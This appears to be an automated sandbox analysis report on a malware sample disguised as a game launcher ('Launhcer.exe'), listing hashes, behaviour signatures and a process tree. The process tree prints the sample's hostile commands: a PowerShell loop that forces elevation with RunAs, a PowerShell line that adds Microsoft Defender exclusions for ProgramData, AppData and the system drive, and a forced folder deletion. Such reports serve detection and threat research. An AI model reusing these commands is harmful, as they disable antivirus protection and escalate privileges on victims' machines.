Overview
overview
10Static
static
3Launcher.dll
windows7-x64
1Launcher.dll
windows10-2004-x64
1Launcher.exe
windows7-x64
10Launcher.exe
windows10-2004-x64
10data/appIn...er.dll
windows7-x64
1data/appIn...er.dll
windows10-2004-x64
1data/appIn...er.exe
windows7-x64
8data/appIn...er.exe
windows10-2004-x64
8data/appIn...AR.exe
windows7-x64
4data/appIn...AR.exe
windows10-2004-x64
4data/appIn...er.dll
windows7-x64
1data/appIn...er.dll
windows10-2004-x64
1data/appIn...er.exe
windows7-x64
8data/appIn...er.exe
windows10-2004-x64
8Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 15:04
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Launcher.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Launcher.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Launcher.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
data/appInfo/services/Launhcer.dll
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
data/appInfo/services/Launhcer.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
data/appInfo/services/Launhcer.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
data/appInfo/services/Launhcer.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
data/appInfo/services/WinRAR.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
data/appInfo/services/WinRAR.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
data/appInfo/services/data/Launcher.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
data/appInfo/services/data/Launcher.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
data/appInfo/services/data/Launcher.exe
Resource
win7-20240903-en
General
-
Target
data/appInfo/services/Launhcer.exe
-
Size
364KB
-
MD5
e5c00b0bc45281666afd14eef04252b2
-
SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758
-
SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
-
SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387
-
SSDEEP
6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2172 powershell.exe 2348 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Launhcer.exepowershell.exeLauncher.exepowershell.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launhcer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2172 powershell.exe 2172 powershell.exe 2172 powershell.exe 2348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
Launhcer.exepowershell.exeLauncher.exedescription pid process target process PID 1960 wrote to memory of 2172 1960 Launhcer.exe powershell.exe PID 1960 wrote to memory of 2172 1960 Launhcer.exe powershell.exe PID 1960 wrote to memory of 2172 1960 Launhcer.exe powershell.exe PID 1960 wrote to memory of 2172 1960 Launhcer.exe powershell.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 2172 wrote to memory of 1404 2172 powershell.exe Launcher.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2348 1404 Launcher.exe powershell.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe PID 1404 wrote to memory of 2896 1404 Launcher.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT4⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5eb858a7f5c893a103a100e9e73057b6e
SHA1b782e85f258d0e65cc28d658a0c71ef4622a8b7f
SHA256236ed5921613c2e4ea5b010e293b03c0c86e0b2f57df99e7817c8290dacb31f9
SHA512df31aff01c54b5c35c6e658adc68e7aa02ffe90788976a1ed1ec283523be451534b337ca56db896630f949303c36b5ffa365a3b4c8d3913be937e3800926b3fd
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD58088640cac58f9c1a9e326ae58f30840
SHA127ca7b34d0489e70799eb38feeacb56a7b065f55
SHA2560f21d6e4686512aabfe74a6e27d6a548a6a850194da103ace452455d16050f17
SHA512cc6396768a5eca2e6dbf0c4b3bab6e1bfa07ca309728b24bfa8d06d1b04acdfb93e1f0a5dda56fd3a64cebab8638f7b8f90085e2bdcb361b100e836a95cabac9